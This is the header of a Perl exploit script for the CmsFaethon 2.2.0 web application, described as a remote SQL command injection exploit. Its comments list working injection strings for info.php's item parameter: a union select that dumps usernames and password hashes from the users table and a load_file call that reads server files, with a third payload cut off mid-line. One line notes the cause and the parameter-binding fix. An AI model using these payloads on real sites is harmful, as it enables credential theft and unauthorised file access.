1 #!/usr/bin/perl
2
3 # |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
−−−−−−−−−−−−−−−−|
4 # | INFORMATION
|
5 # |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
−−−−−−−−−−−−−−−−|
6 # |Web Application : CmsFaethon 2.2.0 Ultimate
|
7 # |Download : http://garr.dl.sourceforge.net/sourceforge/cmsfaethon/cmsfaethon−2.2.0−ultimate.zip
|
8 # |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
−−−−−−−−−−−−−−−−|
9 # |Remote SQL Command Injection Exploit
|
10 # |by Osirys
|
11 # |osirys[at]autistici[dot]org
|
12 # |osirys.org
|
13 # |Greets to: evilsocket, Fireshot, Todd and str0ke
|
14 # |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
−−−−−−−−−−−−−−−−|
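15 # |BUG [SQL Injection] - judging by the strings below, info.php places the item parameter inside a quoted SQL string without escaping; binding item as a query parameter (or validating it strictly) closes this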
16 # | p0c : /[path]/info.php?item=[sql_string]
17 # |SQL Injections used by this sploit :
18 # |[1] /[path]/info.php?item=−2’ union all select concat(username,0x3a,password),0 from f06_users order by ’*
19 # |[2] /[path]/info.php?item=−2’ union all select load_file(’lf’),0 order by ’*
20 # |[3] /path]/info.php?item=−2’ union all select ’co